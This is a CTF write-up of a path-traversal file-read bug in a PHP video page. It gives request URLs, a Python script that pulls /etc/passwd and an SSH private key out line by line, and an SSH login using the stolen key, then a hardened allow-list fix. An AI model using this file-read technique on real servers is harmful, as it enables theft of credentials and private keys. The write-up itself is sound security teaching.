Tags: pentest 

Rating: 5.0

We take a look at the given address:
```
http://challs.dvc.tf:51080
```
An nmap scan of the ports ```51000-52000``` reveals SSH listening on ```51022```.
The website served on port ```51080``` takes two parameters and displays an embedded YouTube video depending on these parameters:
```
http://challs.dvc.tf:51080?/MyTop5=4&playlistTop=TopRapFr
```
presents some French rap video.
Replacing the last parameter with an empty string reveals the vulnerability:
```
http://challs.dvc.tf:51080?/MyTop5=4&playlistTop=
```
We get a PHP warning:
```
Warning: fopen(): Filename cannot be empty in /app/src/public/index.php on line 32
```
The application appears to open the file named by the parameter ```playlistTop``` and return the line indexed by the parameter ```MyTop5```, with no check on where that file lives. Since the filename must not be empty, we oblige and supply the filename we are actually interested in:
```
http://challs.dvc.tf:51080?/MyTop5=4&playlistTop=/etc/passwd
```
This call returns the following line (line 4 of ```/etc/passwd```) appended to the YouTube embed link:
```
sys:x:3:3:sys:/dev:/usr/sbin/nologin
```
showing that our call was successful and that absolute paths are accepted as-is. With a little Python we are able to read arbitrary files line by line:
```
import requests
from bs4 import BeautifulSoup

url = 'http://challs.dvc.tf:51080'
filename = '/etc/passwd'
lines = 30

# Request one line of the target file per call; the server appends that
# line to the YouTube embed URL of the iframe, so we scrape it back out.
for count in range(1, lines + 1):
    response = requests.get(url, params={'MyTop5': count,
                                         'playlistTop': filename})
    soup = BeautifulSoup(response.text, 'html.parser')
    # Everything after 'embed/' in the iframe markup is the leaked line.
    print(str(soup.find_all('iframe')[0]).split('embed/')[1].split('\n')[0])
```
We can list the system users that have shell access:
```
leonardo:x:1001:1001::/home/leonardo:/bin/bash
administrator:x:1002:1002::/home/administrator:/bin/bash
```
Increasing the line count in our script to 40 and changing the filename to the default SSH key location ```/home/leonardo/.ssh/id_rsa```, we are able to read leonardo's private key. With that key we log in via SSH on port ```51022``` (found by the nmap scan above) and obtain the flag in leonardo's home directory.
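For reference, here is the bug and its fix side by side. This is an added example, not the challenge's ```index.php```: it re-implements in Python the behaviour the writeup observed (the ```playlistTop``` value used directly as a filename, ```MyTop5``` selecting a line) next to a hardened handler that maps the playlist name through an allow-list, pins the resolved path to a fixed directory and bounds the rank. The playlist directory, the sample playlist file and the "secret" file are all constructed here so the code runs offline; the allow-list and ```MAX_RANK``` are assumptions about what the real application should have done.

```python
import os
import re
import tempfile

# Constructed sample data standing in for the server's playlist directory
# and for a sensitive file outside it (think /etc/passwd or an SSH key).
PLAYLIST_DIR = tempfile.mkdtemp(prefix="playlists-")
with open(os.path.join(PLAYLIST_DIR, "TopRapFr"), "w") as fh:
    fh.write("vid1aaaaaaa\nvid2bbbbbbb\nvid3ccccccc\n")

SECRET_FILE = os.path.join(tempfile.mkdtemp(prefix="secret-"), "passwd")
with open(SECRET_FILE, "w") as fh:
    fh.write("root:x:0:0:root:/root:/bin/bash\n"
             "leonardo:x:1001:1001::/home/leonardo:/bin/bash\n")

ALLOWED_PLAYLISTS = {"TopRapFr"}   # assumed allow-list of playlist names
MAX_RANK = 5                       # "MyTop5": ranks 1..5 only (assumption)


def vulnerable_top5(params: dict) -> str:
    """Reconstruction of the observed behaviour: the request parameter is the
    filename, so any readable file on the box can be read one line at a time."""
    filename = params.get("playlistTop", "")
    rank = int(params.get("MyTop5", "1"))
    with open(filename) as fh:                 # attacker-controlled path
        lines = fh.read().split("\n")
    return lines[rank - 1]


def hardened_top5(params: dict) -> str:
    """Same feature, but the client never supplies a path: only a name that
    is looked up in an allow-list, and the rank is a small positive integer."""
    playlist = params.get("playlistTop", "")
    if playlist not in ALLOWED_PLAYLISTS:
        raise ValueError("unknown playlist")

    rank_str = params.get("MyTop5", "")
    if not re.fullmatch(r"[1-9][0-9]*", rank_str) or int(rank_str) > MAX_RANK:
        raise ValueError("rank must be an integer between 1 and %d" % MAX_RANK)
    rank = int(rank_str)

    # Defence in depth: even if the allow-list were ever loosened, refuse any
    # resolved path that does not sit directly inside PLAYLIST_DIR.
    base = os.path.realpath(PLAYLIST_DIR)
    path = os.path.realpath(os.path.join(base, playlist))
    if os.path.dirname(path) != base:
        raise ValueError("path escapes playlist directory")

    with open(path) as fh:
        lines = fh.read().splitlines()
    if rank > len(lines):
        raise ValueError("no such entry")
    return lines[rank - 1]


def rejects(params: dict) -> bool:
    """True if the hardened handler refuses the request."""
    try:
        hardened_top5(params)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The vulnerable handler happily leaks a file outside the playlist directory.
    print(vulnerable_top5({"MyTop5": "2", "playlistTop": SECRET_FILE}))
    # The hardened handler only serves named playlists.
    print(hardened_top5({"MyTop5": "2", "playlistTop": "TopRapFr"}))
    print(rejects({"MyTop5": "2", "playlistTop": SECRET_FILE}))
```

The decisive change is that the hardened version never turns user input into a path at all: the allow-list lookup removes the file read primitive, and the ```realpath``` check is only a second line of defence. Validating the rank as a bounded integer also removes the leaked-line oracle that the exploit script above relies on.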